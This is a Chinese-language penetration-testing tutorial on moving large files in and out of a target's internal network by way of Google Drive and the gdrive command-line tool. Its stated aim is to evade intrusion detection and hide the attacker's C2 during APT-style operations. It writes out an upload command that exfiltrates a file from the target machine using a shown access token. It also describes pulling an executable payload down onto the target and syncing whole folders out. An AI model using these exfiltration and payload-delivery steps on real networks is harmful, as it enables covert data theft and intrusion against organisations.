渗透测试 - 内网大规模文件传输

0x01 介绍✦

在定向 apt 大型目标的时候，目标内网系统会有各种流量入侵检测设备，为了动静小一点，也为了不在传输过大流量数据时暴露自己的 c2，我们有必要用到第三方 app/网址进行上传/下载，本次主要就 google drive 上传下载为例，进行实操详解。gdirve 本身是一个跨平台语言 go 开发而成的命令行工具，能够兼容 linux 和 win，并且流量域名全部走的是http://google.com的高可信域名。

0x02 实战和传输✦

0x02.1 测试储备

1. 测试环境：

• Windows10

• 杀软：360，360 杀毒

2. 依赖条件：

• 能够上外网

• 一个 google 账号以及 api (access token....)

先下载 gdrive 到本地的机器上。所有参数如下：

0x02.2 实战教程

我们先上 wiki 看下如何使用 gmail 申请 access-token

It seems that this app has been blocked so you can't get an authorization key by going to the URL that is presented when you run it. The following workaround seems to work:

1.进入https://developers.google.com/oauthplayground。

2.选择 Drive API, 点击 Authorize APIs。

3.点击 Exchange Authorization Codes for Token。

这样就拿到了 Access Token：ya29.A0ARrdaM-vPnyNYOdORKc-j2WgGjgO7OVxXGhW3b80dxa-ukuqsn8lnSssJUWIT7Qu0au-UXrotTNTi4a_kw-O6mItkAplPbwDGxRloVrJA9KM9kx7tPhzTbMpyEryiOk7W4E1HsH7d6GnTCs4AetnHTND5QF1

注意，这里显示了，Access Token 只有 3597 秒的有效期。

有了 Access token 以后，就可以开始在目标机器上传输文件了

gdrive.exe upload 2.tmp --access-token ya29.A0ARrdaM-vPnyNYOdORKc-j2WgGjgO7OVxXGhW3b80dxa-ukuqsn8lnSssJUWIT7Qu0au-UXrotTNTi4a_kw-O6mItkAplPbwDGxRloVrJA9KM9kx7tPhzTbMpyEryiOk7W4E1HsH7d6GnTCs4AetnHTND5QF1

#使用 access-token 作为认证，传输同级目录的 2.tmp 文件到自己的 google drive 网盘上。

我们抓包查看，走的是http://googleapis.com的域名，流量也是http://googleapis.com的流量。

回到我们的 google drive 上查看，可以看到 2.temp 已经上传了。

其他常见参数解释。

在目标机器上列出自己 google drive 上的所有云盘文件。

使用 access-token 作为认证，下载我们 google-drive 网盘上 id 为 1X21v-LjM8RY9v_6lLMq16PL8uptqdADj 的文件(也就是 inst.exe)。

同步目录下所有的文件。

创建 test 目录。

把本地的 1/文件夹里的所有东西，全部同步到云盘上的 test 目录。

00x03 思考和总结✦

• 其他的网盘有没有这种第三方的网址的 api，能不能传输？

• 我们以后在某一个集团的内网的时候，能否根据内网所使用的服务器提供商自带的一些功能进行传输呢？（比如，在 google vps 里使用 google drive, 在 azure 云上的服务器使用 onedrive 文件传输)，这一点就留给读者们继续拓展!

参考文献

[1]gdrive https://github.com/prasmussen/gdrive

[2]gdrive_2.1.1_windows_amd64 https://github.com/prasmussen/gdrive/releases/download/2.1.1/gdrive_2.1.1_windows_amd64.tar.gz

[3]wikihttps://github.com/prasmussen/gdrive/wikiapi apply https://developers.google.com/o